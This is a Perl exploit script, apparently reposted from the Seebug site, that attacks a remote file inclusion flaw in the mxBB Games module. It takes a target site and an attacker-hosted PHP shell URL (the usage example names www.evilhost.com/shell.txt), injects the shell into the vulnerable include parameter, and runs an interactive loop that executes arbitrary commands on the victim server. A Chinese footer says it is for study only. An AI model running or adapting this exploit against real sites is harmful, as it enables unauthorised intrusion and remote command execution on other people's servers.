#!/usr/bin/perl #mx_act (mxBB Games Module) --Remote File Inclusion Exploit #Bug Found & Exploit [c]oded By Dr Max Virus #Download:http://www.mx-system.com/index.php?page=4&action=file&file_id=71 use LWP::UserAgent; $target=@ARGV[0]; $shellsite=@ARGV[1]; $cmdv=@ARGV[2]; if($target!~/http:\/\// || $shellsite!~/http:\/\// || !$cmdv) { usg() } header(); while() { print "[Shell] \$"; while (<STDIN>) { $cmd=$_; chomp($cmd); $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request->new(GET=>$target.'/includes/act_constants.php?board_config[default_lang]=english&mx_root_path$module_root_path='.$shellsite='.?&'.$cmdv.'='.$cmd)or die "\n\n Failed to Connect, Try again!\n"; $res = $xpl->request($req); $info = $res->content; $info =~ tr/[\n]/[&#234;]/; if (!$cmd) { print "\nEnter a Command\n\n"; $info =""; } elsif ($info =~/failed to open stream: HTTP request failed!/ || $info =~/: Cannot execute a blank command in <b>/) { print "\nCould Not Connect to cmd Host or Invalid Command Variable\n"; exit; } elsif ($info =~/^<br.\/>.<b>Warning/) { print "\nInvalid Command\n\n"; }; if($info =~ /(.+)<br.\/>.<b>Warning.(.+)<br.\/>.<b>Warning/) { $final = $1; $final=~ tr/[&#234;]/[\n]/; print "\n$final\n"; last; } else { print "[shell] \$"; } } } last; sub header() { print q{ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- mxBB Module Games -- Remote File Include Exploit Vulnerablity found by: Dr Max Virus Exploit [c]oded by: Dr Max Virus =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- } } sub usg() { header(); print q{ Usage: exploit.pl <fullpath> <Shell Location> <Shell Cmd> <FULL PATH> - Path to site exp. www.site.com <shell Location> - Path to shell exp. www.evilhost.com/shell.txt <shell Cmd Variable> - Command variable for php shell exp. id Example: exploit.pl http://www.site.com/[module_path]/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- }; exit(); }
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论